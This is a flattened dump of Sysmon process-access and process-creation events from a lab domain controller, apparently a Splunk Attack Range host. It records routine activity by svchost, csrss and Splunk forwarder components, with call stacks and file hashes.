10341000x80000000000000007288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91BE-6005-0B03-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91BE-6005-0B03-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-91BE-6005-0B03-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.419{59A5CD1D-91BF-6005-0C03-00000000A301}47404776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91BF-6005-0C03-00000000A301}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91BF-6005-0C03-00000000A301}4740C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91BF-6005-0C03-00000000A301}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.279{59A5CD1D-91BF-6005-0C03-00000000A301}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
